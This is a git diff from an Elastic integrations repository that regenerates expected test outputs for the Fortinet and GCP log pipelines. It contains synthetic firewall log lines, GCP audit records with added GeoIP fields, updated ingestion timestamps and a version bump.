"message": "logver=xpli date=2019-11-1 time=10:16:48 log_id=quae devid=totamre devname=lam logid=quamestq type=porai subtype=oinve level=medium vd=hender srcip=10.84.154.230 srcport=1335 srcintf=enp0s1127 dstip=10.212.63.179 dstport=6790 dstintf=eth1762 poluuid=eufugia sessionid=temqu proto=3 action=allow policyid=tvolup trandisp=lori duration=130.339000 sentbyte=4763 rcvdbyte=4334 devtype=rnatur osname=etdolo osversion=1.802 mastersrcmac=adipisci srcmac=01:00:5e:7b:68:0e crscore=36.122000 craction=culpaq crlevel=quis eventtype=lupt user=upt service=aboN hostname=cupida6106.www5.local profile=tdo reqtype=asperna url=https://api.example.com/aco/empo.jpg?iumdol=iusm#ido direction=unknown msg=peri method=aspernat cat=seq catdesc=olup device_id=uamqu log_id=veli pri=high userfrom=etco adminprof=nulap timezone=CT main_type=radip trigger_policy=tali sub_type=ntin severity_level=loreseos policy=ites src=10.109.172.90 src_port=2785 dst=10.146.77.206 dst_port=1554 http_method=amnihilm http_url=ipsamv http_host=proid http_agent=xcep http_session_id=udantium signature_subclass=sum signature_id=1723 srccountry=iaecon content_switch_name=euf server_pool_name=norume false_positive_mitigation=hilmo user_name=aquaeab monitor_status=eporr http_refer=https://www.example.com/metMalo/santiu.jpg?icon=enderit#roquisqu http_version=lapa dev_id=imadm threat_weight=giatquo history_threat_weight=oeiusm threat_level=oreeuf ftp_mode=iusmodt ftp_cmd=umwrit cipher_suite=atatn msg_id=uatD", "event": { - "ingested": "2021-12-09T13:37:31.907354700Z" + "ingested": "2021-12-14T14:43:11.779441174Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-11-15 time=5:19:22 devname=ptate device_id=Nemoe log_id=cupidat type=generic subtype=onsequ pri=high devid=nostr devname=umtotam logid=mqua type=emU subtype=gnido level=very-high vd=plicab srcip=10.8.161.226 srcport=3191 srcintf=eth5256 dstip=10.13.234.237 
dstport=3760 dstintf=enp0s1149 poluuid=oeiusmo sessionid=nisi proto=6 action=allow policyid=lupt trandisp=tlaborio duration=18.804000 sentbyte=1061 rcvdbyte=6464 devtype=itan osname=iquidexe osversion=1.2314 mastersrcmac=fugia srcmac=01:00:5e:09:8f:0e crscore=5.320000 craction=onof crlevel=quam eventtype=rure user=ipis service=liqu hostname=unt2122.internal.local profile=orsitame reqtype=tassitas url=https://example.org/uidolor/turve.htm?temporai=uasiarch#ect direction=unknown msg=occae method=lpaqu cat=minimav catdesc=col device_id=riamea log_id=ern pri=low userfrom=odtempo adminprof=con timezone=CEST main_type=offici trigger_policy=uipexe sub_type=ium severity_level=quamqua policy=nsequatu src=10.38.18.72 src_port=3177 dst=10.202.250.141 dst_port=1824 http_method=volu http_url=quatDui http_host=stenat http_agent=liquip http_session_id=eiusmodt signature_subclass=dmi signature_id=4174 srccountry=ameaque content_switch_name=pitlabor server_pool_name=essequa false_positive_mitigation=ini user_name=maperia monitor_status=ovolup http_refer=https://mail.example.com/veniamq/uisno.htm?luptas=omm#eaquei http_version=iveli dev_id=lill threat_weight=voluptat history_threat_weight=aturveli threat_level=incidunt ftp_mode=tatnonp ftp_cmd=abi cipher_suite=nimave msg_id=atu", "event": { - "ingested": "2021-12-09T13:37:31.907358500Z" + "ingested": "2021-12-14T14:43:11.779441870Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=siu date=2019-11-30 time=12:21:57 log_id=inrepr devid=cero devname=ita logid=xercitat type=meumfug subtype=umt level=very-high vd=laparia srcip=10.195.87.127 srcport=760 srcintf=lo3094 dstip=10.52.118.202 dstport=6556 dstintf=enp0s5751 poluuid=ectobe sessionid=rehender proto=udp action=block policyid=orinc trandisp=tcons duration=52.473000 sentbyte=7043 rcvdbyte=4714 devtype=suscipi osname=imipsam osversion=1.4674 mastersrcmac=hilm srcmac=01:00:5e:73:ca:c1 
crscore=54.412000 craction=etd crlevel=erspici eventtype=tfug user=atatno service=sed hostname=luptat2613.internal.localhost profile=olupt reqtype=mipsum url=https://www.example.net/Maloru/lapariat.htm?tlabori=rehender#odtempo direction=inbound msg=alorum method=tmollit cat=bori catdesc=antium device_id=reetdo log_id=rchitec pri=medium userfrom=cipitlab adminprof=venia timezone=CT main_type=quid trigger_policy=mwrit sub_type=cid severity_level=lupt policy=adipisc src=10.182.124.88 src_port=116 dst=10.139.144.75 dst_port=5037 http_method=utodi http_url=isiutali http_host=oremeu http_agent=mquaerat http_session_id=conse signature_subclass=mestq signature_id=5535 srccountry=turQuisa content_switch_name=itasper server_pool_name=cidu false_positive_mitigation=ips user_name=modo monitor_status=ela http_refer=https://example.org/unti/niamqu.html?ris=veli#giatnu http_version=tanimide dev_id=ectetur threat_weight=umexer history_threat_weight=nim threat_level=nisiuta ftp_mode=cipitla ftp_cmd=ditautf cipher_suite=oluptasn msg_id=madmin", "event": { - "ingested": "2021-12-09T13:37:31.907361900Z" + "ingested": "2021-12-14T14:43:11.779442557Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-12-14 time=7:24:31 logver=imadm devid=stla devname=cab logid=orr type=olu subtype=quatDu level=low vd=siste srcip=10.151.47.249 srcport=6697 srcintf=lo5632 dstip=10.155.194.6 dstport=3005 dstintf=enp0s6106 poluuid=quatDu sessionid=deFinib proto=HOPOPT action=block policyid=taedic trandisp=ffi duration=130.219000 sentbyte=2693 rcvdbyte=568 devtype=consequ osname=rumw osversion=1.1386 mastersrcmac=temveleu srcmac=01:00:5e:df:96:27 crscore=104.315000 craction=item crlevel=remipsum eventtype=olupt user=usc service=ernat hostname=neavo4796.internal.domain profile=tatemac reqtype=exer url=https://www5.example.com/xea/ssecill.html?quianonn=quun#one direction=internal msg=riame method=uaUte cat=quae 
catdesc=utlabor device_id=ameius log_id=tate pri=very-high userfrom=lupta adminprof=atemseq timezone=CEST main_type=amcolab trigger_policy=ectobea sub_type=itsedq severity_level=pta policy=remipsu src=10.35.10.19 src_port=3941 dst=10.188.124.185 dst_port=5837 http_method=tali http_url=tasper http_host=amquisn http_agent=esciu http_session_id=iamea signature_subclass=perspi signature_id=7117 srccountry=emaccus content_switch_name=expl server_pool_name=giat false_positive_mitigation=uscipi user_name=dolo monitor_status=tionevol http_refer=https://internal.example.com/uptatema/dutpers.htm?tion=iumdol#ept http_version=Mal dev_id=tquasia threat_weight=ficiad history_threat_weight=roinBC threat_level=eufu ftp_mode=tio ftp_cmd=equatDu cipher_suite=exea msg_id=tasnulap", "event": { - "ingested": "2021-12-09T13:37:31.907366100Z" + "ingested": "2021-12-14T14:43:11.779443219Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/fortinet/manifest.yml b/packages/fortinet/manifest.yml index d4143322123..333d0d84fbf 100644 --- a/packages/fortinet/manifest.yml +++ b/packages/fortinet/manifest.yml @@ -1,6 +1,6 @@ name: fortinet title: Fortinet Logs -version: 1.3.1 +version: 1.3.2 release: ga description: Collect logs from Fortinet instances with Elastic Agent. type: integration diff --git a/packages/gcp/changelog.yml b/packages/gcp/changelog.yml index 5ecd24b356b..03d60b92c92 100644 --- a/packages/gcp/changelog.yml +++ b/packages/gcp/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.2.1" changes: - description: Change test public IPs to the supported subset 
diff --git a/packages/gcp/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json b/packages/gcp/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json index d9cdef9c1ad..f1faaf9945b 100644 --- a/packages/gcp/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json +++ b/packages/gcp/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json @@ -1,15 +1,6 @@ { "expected": [ { - "log": { - "logger": "projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access" - }, - "source": { - "ip": "192.168.1.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "project": { "id": "elastic-beats" @@ -19,6 +10,9 @@ "ecs": { "version": "1.12.0" }, + "log": { + "logger": "projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access" + }, "gcp": { "audit": { "request": { 
@@ -48,9 +42,12 @@ "service": { "name": "cloudbilling.googleapis.com" }, + "source": { + "ip": "192.168.1.1" + }, "event": { "action": "GetResourceBillingInfo", - "ingested": "2021-12-09T13:37:42.255753100Z", + "ingested": "2021-12-14T14:43:22.923828793Z", "original": "{\"insertId\":\"-uihnmjctwo\",\"logName\":\"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access\",\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"xxx@xxx.xxx\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"resourcemanager.projects.get\",\"resource\":\"projects/elastic-beats\",\"resourceAttributes\":{}}],\"methodName\":\"GetResourceBillingInfo\",\"request\":{\"@type\":\"type.googleapis.com/google.internal.cloudbilling.billingaccount.v1.GetResourceBillingInfoRequest\",\"resourceName\":\"projects/189716325846\"},\"requestMetadata\":{\"callerIp\":\"192.168.1.1\",\"destinationAttributes\":{},\"requestAttributes\":{}},\"resourceName\":\"projects/elastic-beats\",\"serviceName\":\"cloudbilling.googleapis.com\",\"status\":{}},\"receiveTimestamp\":\"2019-12-19T00:49:36.313482371Z\",\"resource\":{\"labels\":{\"project_id\":\"elastic-beats\"},\"type\":\"project\"},\"severity\":\"INFO\",\"timestamp\":\"2019-12-19T00:49:36.086Z\"}", "id": "-uihnmjctwo", "kind": "event", @@ -58,7 +55,10 @@ }, "user": { "email": "xxx@xxx.xxx" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { 
@@ -119,7 +119,7 @@ }, "event": { "action": "beta.compute.machineTypes.aggregatedList", - "ingested": "2021-12-09T13:37:42.255762300Z", + "ingested": "2021-12-14T14:43:22.923831390Z", "original": "{\"insertId\":\"-h6onuze1h7dg\",\"logName\":\"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access\",\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"xxx@xxx.xxx\"},\"authorizationInfo\":[{\"granted\":false,\"permission\":\"compute.machineTypes.list\",\"resourceAttributes\":{\"name\":\"projects/elastic-beats\",\"service\":\"resourcemanager\",\"type\":\"resourcemanager.projects\"}}],\"methodName\":\"beta.compute.machineTypes.aggregatedList\",\"numResponseItems\":\"71\",\"request\":{\"@type\":\"type.googleapis.com/compute.machineTypes.aggregatedList\"},\"requestMetadata\":{\"callerIp\":\"192.168.1.1\",\"callerSuppliedUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)\",\"destinationAttributes\":{},\"requestAttributes\":{\"auth\":{},\"time\":\"2019-12-19T00:45:51.711Z\"}},\"resourceLocation\":{\"currentLocations\":[\"global\"]},\"resourceName\":\"projects/elastic-beats/global/machineTypes\",\"serviceName\":\"compute.googleapis.com\"},\"receiveTimestamp\":\"2019-12-19T00:45:52.367887078Z\",\"resource\":{\"labels\":{\"location\":\"global\",\"method\":\"compute.machineTypes.aggregatedList\",\"project_id\":\"elastic-beats\",\"service\":\"compute.googleapis.com\",\"version\":\"beta\"},\"type\":\"api\"},\"severity\":\"INFO\",\"timestamp\":\"2019-12-19T00:45:51.228Z\"}", "id": "-h6onuze1h7dg", "kind": "event", 
@@ -213,7 +213,7 @@ }, "event": { "action": "beta.compute.instances.aggregatedList", - "ingested": "2021-12-09T13:37:42.255766900Z", + "ingested": "2021-12-14T14:43:22.923831907Z", "original": "{\"insertId\":\"yonau2dg2zi\",\"logName\":\"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access\",\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"xxx@xxx.xxx\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"compute.instances.list\",\"resourceAttributes\":{\"name\":\"projects/elastic-beats\",\"service\":\"resourcemanager\",\"type\":\"resourcemanager.projects\"}}],\"methodName\":\"beta.compute.instances.aggregatedList\",\"numResponseItems\":\"61\",\"request\":{\"@type\":\"type.googleapis.com/compute.instances.aggregatedList\"},\"requestMetadata\":{\"callerIp\":\"192.168.1.1\",\"callerSuppliedUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)\",\"destinationAttributes\":{},\"requestAttributes\":{\"auth\":{},\"time\":\"2019-12-19T00:44:25.198Z\"}},\"response\":{\"@type\":\"core.k8s.io/v1.Status\",\"apiVersion\":\"v1\",\"details\":{\"group\":\"batch\",\"kind\":\"jobs\",\"name\":\"gsuite-exporter-1589294700\",\"uid\":\"2beff34a-945f-11ea-bacf-42010a80007f\"},\"kind\":\"Status\",\"metadata\":{},\"status\":\"Success\"},\"resourceLocation\":{\"currentLocations\":[\"global\"]},\"resourceName\":\"projects/elastic-beats/global/instances\",\"serviceName\":\"compute.googleapis.com\"},\"receiveTimestamp\":\"2019-12-19T00:44:25.262379373Z\",\"resource\":{\"labels\":{\"location\":\"global\",\"method\":\"compute.instances.aggregatedList\",\"project_id\":\"elastic-beats\",\"service\":\"compute.googleapis.com\",\"version\":\"beta\"},\"type\":\"api\"},\"severity\":\"INFO\",\"timestamp\":\"2019-12-19T00:44:25.051Z\"}", "id": "yonau2dg2zi", "kind": "event", 
@@ -298,7 +298,7 @@ }, "event": { "action": "beta.compute.instances.aggregatedList", - "ingested": "2021-12-09T13:37:42.255770400Z", + "ingested": "2021-12-14T14:43:22.923832305Z", "original": "{\"insertId\":\"yonau3dc2zi\",\"logName\":\"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access\",\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"xxx@xxx.xxx\"},\"authorizationInfo\":[{\"permission\":\"compute.instances.list\",\"resourceAttributes\":{\"name\":\"projects/elastic-beats\",\"service\":\"resourcemanager\",\"type\":\"resourcemanager.projects\"}}],\"methodName\":\"beta.compute.instances.aggregatedList\",\"numResponseItems\":\"61\",\"request\":{\"@type\":\"type.googleapis.com/compute.instances.aggregatedList\"},\"requestMetadata\":{\"callerIp\":\"192.168.1.1\",\"callerSuppliedUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)\",\"destinationAttributes\":{},\"requestAttributes\":{\"auth\":{},\"time\":\"2019-12-19T00:44:25.198Z\"}},\"resourceLocation\":{\"currentLocations\":[\"global\"]},\"resourceName\":\"projects/elastic-beats/global/instances\",\"serviceName\":\"compute.googleapis.com\",\"status\":{\"code\":7,\"message\":\"PERMISSION_DENIED\"}},\"receiveTimestamp\":\"2019-12-19T00:44:25.262379373Z\",\"resource\":{\"labels\":{\"location\":\"global\",\"method\":\"compute.instances.aggregatedList\",\"project_id\":\"elastic-beats\",\"service\":\"compute.googleapis.com\",\"version\":\"beta\"},\"type\":\"api\"},\"severity\":\"INFO\",\"timestamp\":\"2019-12-19T00:44:25.051Z\"}", "id": "yonau3dc2zi", "kind": "event", 
@@ -386,7 +386,7 @@ }, "event": { "action": "io.k8s.authorization.v1beta1.subjectaccessreviews.create", - "ingested": "2021-12-09T13:37:42.255774900Z", + "ingested": "2021-12-14T14:43:22.923832694Z", "original": "{\"insertId\":\"87efd529-6349-45d2-b905-fc607e6c5d3b\",\"labels\":{\"authorization.k8s.io/decision\":\"allow\",\"authorization.k8s.io/reason\":\"RBAC: allowed by ClusterRoleBinding \\\"cert-manager-webhook:auth-delegator\\\" of ClusterRole \\\"system:auth-delegator\\\" to ServiceAccount \\\"cert-manager-webhook/cert-manager\\\"\"},\"logName\":\"projects/foo/logs/cloudaudit.googleapis.com%2Fdata_access\",\"operation\":{\"first\":true,\"id\":\"5555555-6349-45d2-b905-fc607e6c5d3b\",\"last\":true,\"producer\":\"k8s.io\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"system:serviceaccount:cert-manager:cert-manager-webhook\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"io.k8s.authorization.v1beta1.subjectaccessreviews.create\",\"resource\":\"authorization.k8s.io/v1beta1/subjectaccessreviews\"}],\"methodName\":\"io.k8s.authorization.v1beta1.subjectaccessreviews.create\",\"request\":{\"@type\":\"authorization.k8s.io/v1beta1.SubjectAccessReview\",\"apiVersion\":\"authorization.k8s.io/v1beta1\",\"kind\":\"SubjectAccessReview\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"group\":[\"system:serviceaccounts\",\"system:serviceaccounts:kube-system\",\"system:authenticated\"],\"nonResourceAttributes\":{\"path\":\"/apis/webhook.cert-manager.io/v1beta1\",\"verb\":\"get\"},\"user\":\"system:serviceaccount:kube-system:resourcequota-controller\"},\"status\":{\"allowed\":false}},\"requestMetadata\":{\"callerIp\":\"10.11.12.13\",\"callerSuppliedUserAgent\":\"webhook/v0.0.0 (linux/amd64) 
kubernetes/$Format\"},\"resourceName\":\"authorization.k8s.io/v1beta1/subjectaccessreviews\",\"response\":{\"@type\":\"authorization.k8s.io/v1beta1.SubjectAccessReview\",\"apiVersion\":\"authorization.k8s.io/v1beta1\",\"kind\":\"SubjectAccessReview\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"group\":[\"system:serviceaccounts\",\"system:serviceaccounts:kube-system\",\"system:authenticated\"],\"nonResourceAttributes\":{\"path\":\"/apis/webhook.cert-manager.io/v1beta1\",\"verb\":\"get\"},\"user\":\"system:serviceaccount:kube-system:resourcequota-controller\"},\"status\":{\"allowed\":true,\"reason\":\"RBAC: allowed by ClusterRoleBinding \\\"system:discovery\\\" of ClusterRole \\\"system:discovery\\\" to Group \\\"system:authenticated\\\"\"}},\"serviceName\":\"k8s.io\",\"status\":{\"code\":0}},\"receiveTimestamp\":\"2020-08-05T21:07:32.157698684Z\",\"resource\":{\"labels\":{\"cluster_name\":\"analysis-cluster\",\"location\":\"us-central1-a\",\"project_id\":\"elastic-siem\"},\"type\":\"k8s_cluster\"},\"timestamp\":\"2020-08-05T21:07:30.974750Z\"}", "id": "87efd529-6349-45d2-b905-fc607e6c5d3b", "kind": "event", @@ -411,6 +411,18 @@ "logger": "projects/foo/logs/cloudaudit.googleapis.com%2Factivity" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ 
@@ -471,7 +483,7 @@ }, "event": { "action": "v1.compute.images.insert", - "ingested": "2021-12-09T13:37:42.255780100Z", + "ingested": "2021-12-14T14:43:22.923833092Z", "original": "{\"insertId\":\"v2spcwdzmc2\",\"logName\":\"projects/foo/logs/cloudaudit.googleapis.com%2Factivity\",\"operation\":{\"first\":true,\"id\":\"operation-1596664766354-5ac287c395484-fa3923bd-543e018e\",\"producer\":\"compute.googleapis.com\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"user@mycompany.com\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"compute.images.create\",\"resourceAttributes\":{\"name\":\"projects/foo/global/images/windows-server-2016-v20200805\",\"service\":\"compute\",\"type\":\"compute.images\"}}],\"methodName\":\"v1.compute.images.insert\",\"request\":{\"@type\":\"type.googleapis.com/compute.images.insert\",\"family\":\"windows-server-2016\",\"guestOsFeatures\":[{\"type\":\"VIRTIO_SCSI_MULTIQUEUE\"},{\"type\":\"WINDOWS\"}],\"name\":\"windows-server-2016-v20200805\",\"rawDisk\":{\"source\":\"https://storage.googleapis.com/storage/v1/b/foo/o/windows-server-2016-v20200805.tar.gz\"},\"sourceType\":\"RAW\"},\"requestMetadata\":{\"callerIp\":\"67.43.156.13\",\"callerSuppliedUserAgent\":\"google-cloud-sdk gcloud/290.0.1 command/gcloud.compute.images.create invocation-id/032752ad0fa44b4ea951951d2deef6a3 environment/None environment-version/None interactive/True from-script/False python/2.7.17 term/xterm-256color (Macintosh; Intel Mac OS X 
19.6.0),gzip(gfe)\",\"destinationAttributes\":{},\"requestAttributes\":{\"auth\":{},\"time\":\"2020-08-05T21:59:27.515Z\"}},\"resourceLocation\":{\"currentLocations\":[\"eu\"]},\"resourceName\":\"projects/foo/global/images/windows-server-2016-v20200805\",\"response\":{\"@type\":\"type.googleapis.com/operation\",\"id\":\"44919313\",\"insertTime\":\"2020-08-05T14:59:27.259-07:00\",\"name\":\"operation-1596664766354-5ac287c395484-fa3923bd-543e018e\",\"operationType\":\"insert\",\"progress\":\"0\",\"selfLink\":\"https://www.googleapis.com/compute/v1/projects/foo/global/operations/operation-1596664766354-5ac287c395484-fa3923bd-543e018e\",\"selfLinkWithId\":\"https://www.googleapis.com/compute/v1/projects/foo/global/operations/4491931805423146320\",\"startTime\":\"2020-08-05T14:59:27.274-07:00\",\"status\":\"RUNNING\",\"targetId\":\"12345\",\"targetLink\":\"https://www.googleapis.com/compute/v1/projects/foo/global/images/windows-server-2016-v20200805\",\"user\":\"user@mycompany.com\"},\"serviceName\":\"compute.googleapis.com\"},\"receiveTimestamp\":\"2020-08-05T21:59:27.822546978Z\",\"resource\":{\"labels\":{\"image_id\":\"771879043\",\"project_id\":\"foo\"},\"type\":\"gce_image\"},\"severity\":\"NOTICE\",\"timestamp\":\"2020-08-05T21:59:26.456Z\"}", "id": "v2spcwdzmc2", "kind": "event", @@ -498,6 +510,18 @@ "logger": "projects/foo/logs/cloudaudit.googleapis.com%2Factivity" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ 
@@ -538,7 +562,7 @@ }, "event": { "action": "beta.compute.instances.stop", - "ingested": "2021-12-09T13:37:42.255784900Z", + "ingested": "2021-12-14T14:43:22.923833571Z", "original": "{\"insertId\":\"-c7ctxmd2zab\",\"logName\":\"projects/foo/logs/cloudaudit.googleapis.com%2Factivity\",\"operation\":{\"id\":\"operation-1596646123456-5ac2438b775f6-f8ca1382-e70b6831\",\"last\":true,\"producer\":\"compute.googleapis.com\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"user@mycompany.com\"},\"methodName\":\"beta.compute.instances.stop\",\"request\":{\"@type\":\"type.googleapis.com/compute.instances.stop\"},\"requestMetadata\":{\"callerIp\":\"67.43.156.13\",\"callerSuppliedUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0,gzip(gfe),gzip(gfe)\"},\"resourceName\":\"projects/foo/zones/us-central1-a/instances/win10-test\",\"serviceName\":\"compute.googleapis.com\"},\"receiveTimestamp\":\"2020-08-05T16:56:41.315135528Z\",\"resource\":{\"labels\":{\"instance_id\":\"590261181\",\"project_id\":\"foo\",\"zone\":\"us-central1-a\"},\"type\":\"gce_instance\"},\"severity\":\"NOTICE\",\"timestamp\":\"2020-08-05T16:56:40.428Z\"}", "id": "-c7ctxmd2zab", "kind": "event", 
@@ -613,7 +637,7 @@ }, "event": { "action": "io.k8s.core.v1.nodes.list", - "ingested": "2021-12-09T13:37:42.255788900Z", + "ingested": "2021-12-14T14:43:22.923833957Z", "original": "{\"insertId\":\"94170ac4-6e82-4345-98ad-3c780222d19d\",\"labels\":{\"authorization.k8s.io/decision\":\"allow\",\"authorization.k8s.io/reason\":\"\"},\"logName\":\"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access\",\"operation\":{\"first\":true,\"id\":\"94170ac4-6e82-4345-98ad-3c780222d19d\",\"last\":true,\"producer\":\"k8s.io\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"xxx@xxx.xxx\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"io.k8s.core.v1.nodes.list\",\"resource\":\"core/v1/nodes\"}],\"methodName\":\"io.k8s.core.v1.nodes.list\",\"requestMetadata\":{\"callerIp\":\"192.168.1.1\",\"callerSuppliedUserAgent\":\"GoogleCloudConsole\"},\"resourceName\":\"core/v1/nodes\",\"serviceName\":\"k8s.io\",\"status\":{}},\"receiveTimestamp\":\"2021-04-23T14:47:31.94822935Z\",\"resource\":{\"labels\":{\"cluster_name\":\"analysis-cluster\",\"location\":\"us-central1-a\",\"project_id\":\"elastic-siem\"},\"type\":\"k8s_cluster\"},\"timestamp\":\"2021-04-23T14:47:07.535383Z\"}", "id": "94170ac4-6e82-4345-98ad-3c780222d19d", "kind": "event", 
@@ -682,7 +706,7 @@ }, "event": { "action": "io.k8s.extensions.v1beta1.ingresses.list", - "ingested": "2021-12-09T13:37:42.255793600Z", + "ingested": "2021-12-14T14:43:22.923834340Z", "original": "{\"insertId\":\"b10a904a-faa4-4e0d-9ec3-7bc6a180196a\",\"labels\":{\"authorization.k8s.io/decision\":\"allow\",\"authorization.k8s.io/reason\":\"\",\"k8s.io/deprecated\":\"true\",\"k8s.io/removed-release\":\"1.22\"},\"logName\":\"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access\",\"operation\":{\"first\":true,\"id\":\"b10a904a-faa4-4e0d-9ec3-7bc6a180196a\",\"last\":true,\"producer\":\"k8s.io\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"xxx@xxx.xxx\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"io.k8s.extensions.v1beta1.ingresses.list\",\"resource\":\"extensions/v1beta1/namespaces/cos-auditd/ingresses\"}],\"methodName\":\"io.k8s.extensions.v1beta1.ingresses.list\",\"requestMetadata\":{\"callerIp\":\"192.168.1.1\",\"callerSuppliedUserAgent\":\"GoogleCloudConsole\"},\"resourceName\":\"extensions/v1beta1/namespaces/cos-auditd/ingresses\",\"serviceName\":\"k8s.io\",\"status\":{}},\"receiveTimestamp\":\"2021-04-23T14:16:36.37362467Z\",\"resource\":{\"labels\":{\"cluster_name\":\"analysis-cluster\",\"location\":\"us-central1-a\",\"project_id\":\"elastic-siem\"},\"type\":\"k8s_cluster\"},\"timestamp\":\"2021-04-23T14:16:07.574776Z\"}", "id": "b10a904a-faa4-4e0d-9ec3-7bc6a180196a", "kind": "event", 
@@ -751,7 +775,7 @@ }, "event": { "action": "io.k8s.get", - "ingested": "2021-12-09T13:37:42.255799400Z", + "ingested": "2021-12-14T14:43:22.923834752Z", "original": "{\"insertId\":\"e973134d-b4d5-4e2f-92b8-82bba13fdb92\",\"labels\":{\"authorization.k8s.io/decision\":\"allow\",\"authorization.k8s.io/reason\":\"RBAC: allowed by ClusterRoleBinding \\\"system:public-info-viewer\\\" of ClusterRole \\\"system:public-info-viewer\\\" to Group \\\"system:unauthenticated\\\"\"},\"logName\":\"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access\",\"operation\":{\"first\":true,\"id\":\"e973134d-b4d5-4e2f-92b8-82bba13fdb92\",\"last\":true,\"producer\":\"k8s.io\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"system:anonymous\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"io.k8s.get\",\"resource\":\"readyz\"}],\"methodName\":\"io.k8s.get\",\"requestMetadata\":{\"callerIp\":\"127.0.0.1\",\"callerSuppliedUserAgent\":\"kube-probe/1.19+\"},\"resourceName\":\"readyz\",\"serviceName\":\"k8s.io\",\"status\":{}},\"receiveTimestamp\":\"2021-04-29T08:19:21.606980385Z\",\"resource\":{\"labels\":{\"cluster_name\":\"analysis-cluster\",\"location\":\"us-central1-a\",\"project_id\":\"elastic-siem\"},\"type\":\"k8s_cluster\"},\"timestamp\":\"2021-04-29T08:19:20.80581Z\"}", "id": "e973134d-b4d5-4e2f-92b8-82bba13fdb92", "kind": "event", 
@@ -820,7 +844,7 @@ }, "event": { "action": "io.k8s.get", - "ingested": "2021-12-09T13:37:42.255803700Z", + "ingested": "2021-12-14T14:43:22.923835142Z", "original": "{\"insertId\":\"03adfb9f-71a3-4f41-9701-29b5542f4d22\",\"labels\":{\"authorization.k8s.io/decision\":\"allow\",\"authorization.k8s.io/reason\":\"RBAC: allowed by ClusterRoleBinding \\\"system:discovery\\\" of ClusterRole \\\"system:discovery\\\" to Group 